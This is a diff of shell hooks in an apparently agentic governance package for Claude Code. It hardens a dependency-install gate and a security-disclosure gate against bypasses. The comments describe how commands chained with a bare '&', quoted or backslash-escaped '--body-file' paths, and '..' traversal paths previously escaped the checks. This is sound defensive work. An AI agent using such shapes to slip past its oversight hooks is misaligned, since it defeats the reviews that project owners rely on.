+ # 0.17.0 helix-019 #3: delegate splitting to the shared
67
+ # `_rea_split_segments` so this gate inherits the full separator set
68
+ # (including bare `&` background-process operator added in 0.16.1)
69
+ # and the quote-mask that prevents over-fire from in-quote separators.
70
+ # Pre-fix the local segmenter split on `|||&&|;|` only, missing bare
71
+ # `&` — `echo warmup & pnpm add lodash` stayed merged into one segment
72
+ # and the install-pattern leading-token check skipped it entirely.
67
73
  local segments
68
- segments=$(printf '%s\n' "$cmd" | sed -E 's/(\|\||\&\&|;|\|)/\n/g')
74
+ if [ -f "$(dirname "$0")/_lib/cmd-segments.sh" ]; then
75
+ # shellcheck source=_lib/cmd-segments.sh
76
+ source "$(dirname "$0")/_lib/cmd-segments.sh"
77
+ segments=$(_rea_split_segments "$cmd")
78
+ else
79
+ # Fallback (lib unavailable): legacy local splitter preserved.
80
+ segments=$(printf '%s\n' "$cmd" | sed -E 's/(\|\||\&\&|;|\||\&)/\n/g')
81
+ fi
69
82
 
70
83
  while IFS= read -r segment; do
71
84
  # Trim leading whitespace.
@@ -118,37 +118,104 @@ REA_ROOT="${CLAUDE_PROJECT_DIR:-$(pwd)}"
118
118
  BODY_FILE_TEXT=""
119
119
  _extract_body_file_paths() {
120
120
  # Emit each `--body-file PATH` and `-F PATH` argument on its own line.
121
- # Skips the stdin form (`-`) and `-F=foo`/`--body-file=foo` (handled
122
- # by a separate awk pass below).
121
+ # Skips the stdin form (`-`) and emits the path verbatim from the
122
+ # equals-form (`--body-file=PATH` / `-F=PATH`).
123
+ #
124
+ # 0.17.0 helix-019 #2: quote-aware tokenization. The pre-fix awk split
125
+ # on whitespace, breaking `--body-file "security notes.md"` into three
126
+ # tokens — the hook then tried to read `"security` (with literal
127
+ # leading quote), failed, and silently skipped the body scan. Now we
128
+ # walk the string with quote-state awareness: whitespace inside
129
+ # matched `"..."` / `'...'` spans is part of the token, not a
130
+ # separator. Single-quote spans have no escape semantics; double-quote
131
+ # spans treat `\"` and `\\` as literal escapes (POSIX shell rules).
123
132
  printf '%s' "$COMMAND" \
124
133
  | awk '
125
- BEGIN { skip_next = 0; flag_was = "" }
134
+ BEGIN { skip_next = 0 }
135
+ function strip_outer_quotes(s, n, first, last) {
136
+ n = length(s)
137
+ if (n < 2) return s
138
+ first = substr(s, 1, 1)
139
+ last = substr(s, n, 1)
140
+ if ((first == "\"" && last == "\"") || (first == "'\''" && last == "'\''")) {
141
+ return substr(s, 2, n - 2)
142
+ }
143
+ return s
144
+ }
145
+ function emit_token(t) {
146
+ if (skip_next) {
147
+ skip_next = 0
148
+ if (t == "-" || t == "") return
149
+ t = strip_outer_quotes(t)
150
+ print t
151
+ return
152
+ }
153
+ if (t == "--body-file" || t == "-F") { skip_next = 1; return }
154
+ if (t ~ /^--body-file=/) {
155
+ v = substr(t, length("--body-file=") + 1)
156
+ v = strip_outer_quotes(v)
157
+ if (v != "" && v != "-") print v
158
+ }
159
+ if (t ~ /^-F=/) {
160
+ v = substr(t, length("-F=") + 1)
161
+ v = strip_outer_quotes(v)
162
+ if (v != "" && v != "-") print v
163
+ }
164
+ }
126
165
  {
127
- n = split($0, toks, /[[:space:]]+/)
128
- for (i = 1; i <= n; i++) {
129
- t = toks[i]
130
- if (skip_next) {
131
- skip_next = 0
132
- if (t == "-" || t == "") continue
133
- # Strip surrounding quotes from the token if present.
134
- gsub(/^["'"'"']/, "", t)
135
- gsub(/["'"'"']$/, "", t)
136
- print t
166
+ line = $0
167
+ n = length(line)
168
+ i = 1
169
+ tok = ""
170
+ mode = 0 # 0=plain, 1=double-quoted, 2=single-quoted
171
+ while (i <= n) {
172
+ ch = substr(line, i, 1)
173
+ if (mode == 0) {
174
+ # 0.18.0 helix-020 G3.B fix: in plain (unquoted) mode,
175
+ # `\X` (any character X) is the POSIX shell escape for
176
+ # the literal character X — most commonly a space in
177
+ # paths like `path\ with\ spaces.md`. Pre-fix the
178
+ # tokenizer treated the `\` as an ordinary character and
179
+ # truncated at the following space, dropping the rest of
180
+ # the path. We now consume the backslash and emit the
181
+ # following byte as a literal part of the current token.
182
+ # `\<eol>` (line-continuation) is left intact — emit the
183
+ # `\` and let the splitter flow into the next record on
184
+ # the assumption that the caller already joined the line.
185
+ if (ch == "\\" && i < n) {
186
+ nxt = substr(line, i + 1, 1)
187
+ tok = tok nxt
188
+ i += 2
189
+ continue
190
+ }
191
+ if (ch == " " || ch == "\t") {
192
+ if (tok != "") { emit_token(tok); tok = "" }
193
+ i++; continue
194
+ }
195
+ if (ch == "\"") { mode = 1; tok = tok ch; i++; continue }
196
+ if (ch == "'\''") { mode = 2; tok = tok ch; i++; continue }
197
+ tok = tok ch
198
+ i++
137
199
  continue
138
200
  }
139
- if (t == "--body-file" || t == "-F") { skip_next = 1; continue }
140
- # Equals form.
141
- if (t ~ /^--body-file=/) {
142
- v = substr(t, length("--body-file=") + 1)
143
- gsub(/^["'"'"']/, "", v); gsub(/["'"'"']$/, "", v)
144
- if (v != "" && v != "-") print v
145
- }
146
- if (t ~ /^-F=/) {
147
- v = substr(t, length("-F=") + 1)
148
- gsub(/^["'"'"']/, "", v); gsub(/["'"'"']$/, "", v)
149
- if (v != "" && v != "-") print v
201
+ if (mode == 1) {
202
+ if (ch == "\\" && i < n) {
203
+ nxt = substr(line, i + 1, 1)
204
+ tok = tok ch nxt
205
+ i += 2
206
+ continue
207
+ }
208
+ if (ch == "\"") { mode = 0; tok = tok ch; i++; continue }
209
+ tok = tok ch
210
+ i++
211
+ continue
150
212
  }
213
+ # mode == 2
214
+ if (ch == "'\''") { mode = 0; tok = tok ch; i++; continue }
215
+ tok = tok ch
216
+ i++
151
217
  }
218
+ if (tok != "") emit_token(tok)
152
219
  }'
153
220
  }
154
221
  while IFS= read -r body_path; do
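Note (illustrative, not part of the diff): the quote-aware tokenization above can be sketched in plain bash. This is a simplification under stated assumptions: the function name `tokenize` is hypothetical, and quotes are dropped while scanning rather than kept in the token and stripped afterwards as the awk version does.

```shell
#!/usr/bin/env bash
# Hypothetical tokenizer: prints one token per line. Whitespace inside
# quotes stays in the token; `\X` in plain mode yields a literal X.
tokenize() {
  local line="$1" tok="" ch mode=plain have=0
  local i n=${#line}
  for (( i = 0; i < n; i++ )); do
    ch="${line:i:1}"
    case "$mode" in
      plain)
        if [[ "$ch" == "\\" ]] && (( i + 1 < n )); then
          i=$(( i + 1 )); tok+="${line:i:1}"; have=1
        elif [[ "$ch" == " " || "$ch" == $'\t' ]]; then
          if (( have )); then printf '%s\n' "$tok"; fi
          tok=""; have=0
        elif [[ "$ch" == '"' ]]; then mode=double; have=1
        elif [[ "$ch" == "'" ]]; then mode=single; have=1
        else tok+="$ch"; have=1
        fi ;;
      double)
        if [[ "$ch" == "\\" ]] && (( i + 1 < n )); then
          i=$(( i + 1 ))
          case "${line:i:1}" in
            '"'|"\\") tok+="${line:i:1}" ;;     # \" and \\ are literal escapes
            *)        tok+="\\${line:i:1}" ;;   # other backslashes are kept
          esac
        elif [[ "$ch" == '"' ]]; then mode=plain
        else tok+="$ch"
        fi ;;
      single)
        if [[ "$ch" == "'" ]]; then mode=plain; else tok+="$ch"; fi ;;
    esac
  done
  if (( have )); then printf '%s\n' "$tok"; fi
  return 0
}

tokenize 'gh pr create --body-file "security notes.md" -F path\ with\ spaces.md'
```

A flag scanner can then treat the token following `--body-file` or `-F` as the path without re-joining pieces.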
@@ -180,12 +247,24 @@ while IFS= read -r body_path; do
180
247
  esac
181
248
  done
182
249
  resolved="/$(IFS=/; printf '%s' "${_bf_parts[*]}")"
183
- # If the raw path used `..` AND the resolved form escapes REA_ROOT,
184
- # refuse that's the obfuscation shape we care about. A file under
185
- # /tmp or /var/folders without `..` segments is fine.
250
+ # 0.17.0 helix-019 #1: HARD REFUSAL on traversal escaping REA_ROOT.
251
+ # Pre-fix the gate logged "skipping body scan" and exited 0 every
252
+ # sensitive payload at the resolved external path bypassed the
253
+ # disclosure check. The traversal-out-of-root shape exists ONLY to
254
+ # obfuscate; legitimate workflows pass absolute tmpfile paths
255
+ # (`/tmp/...`, `/var/folders/...`) without `..` segments.
186
256
  if [[ "$resolved" != "$REA_ROOT" && "$resolved" != "$REA_ROOT"/* ]]; then
187
- printf 'security-disclosure-gate: --body-file path uses `..` traversal escaping project root; skipping body scan\n' >&2
188
- continue
257
+ {
258
+ printf 'SECURITY DISCLOSURE GATE: --body-file path traversal escapes project root\n'
259
+ printf '\n'
260
+ printf ' Path: %s\n' "$raw_path"
261
+ printf ' Resolved: %s\n' "$resolved"
262
+ printf '\n'
263
+ printf ' Rule: --body-file paths whose canonical form uses `..` segments to\n'
264
+ printf ' escape REA_ROOT are refused. Move the file inside the project\n'
265
+ printf ' tree, or paste the body inline via --body.\n'
266
+ } >&2
267
+ exit 2
189
268
  fi
190
269
  fi
191
270
  if [[ ! -r "$resolved" ]]; then
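Note (illustrative, not part of the diff): the containment test above depends on resolving `..` segments lexically before comparing against the project root. A minimal sketch of that resolution and check follows; `normalize_path` and `inside_root` are hypothetical names, and the sketch covers only absolute paths and does not follow symlinks.

```shell
#!/usr/bin/env bash
# Hypothetical helper: lexically normalize an absolute path by dropping
# empty and `.` segments and popping one segment for each `..`.
normalize_path() {
  local -a segs=() out=()
  local seg
  IFS=/ read -ra segs <<< "$1"
  for seg in "${segs[@]}"; do
    case "$seg" in
      ''|.) ;;
      ..) if (( ${#out[@]} > 0 )); then unset 'out[${#out[@]}-1]'; fi ;;
      *)  out+=("$seg") ;;
    esac
  done
  local IFS=/
  printf '/%s\n' "${out[*]}"
}

# inside_root ROOT PATH: succeeds when PATH resolves to ROOT or below it.
inside_root() {
  local root="$1" resolved
  resolved=$(normalize_path "$2")
  [[ "$resolved" == "$root" || "$resolved" == "$root"/* ]]
}

inside_root /repo /repo/docs/../notes.md && echo "inside root"
inside_root /repo /repo/docs/../../etc/passwd || echo "escapes root"
```

Comparing against `"$root"/*` rather than `"$root"*` keeps a sibling such as `/repository` from passing as a child of `/repo`.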
package/package.json CHANGED
@@ -1,6 +1,6 @@
1
1
  {
2
2
  "name": "@bookedsolid/rea",
3
- "version": "0.16.4",
3
+ "version": "0.18.0",
4
4
  "description": "Agentic governance layer for Claude Code — policy enforcement, hook-based safety gates, audit logging, and Codex-integrated adversarial review for AI-assisted projects",
5
5
  "license": "MIT",
6
6
  "author": "Booked Solid Technology <oss@bookedsolid.tech> (https://bookedsolid.tech)",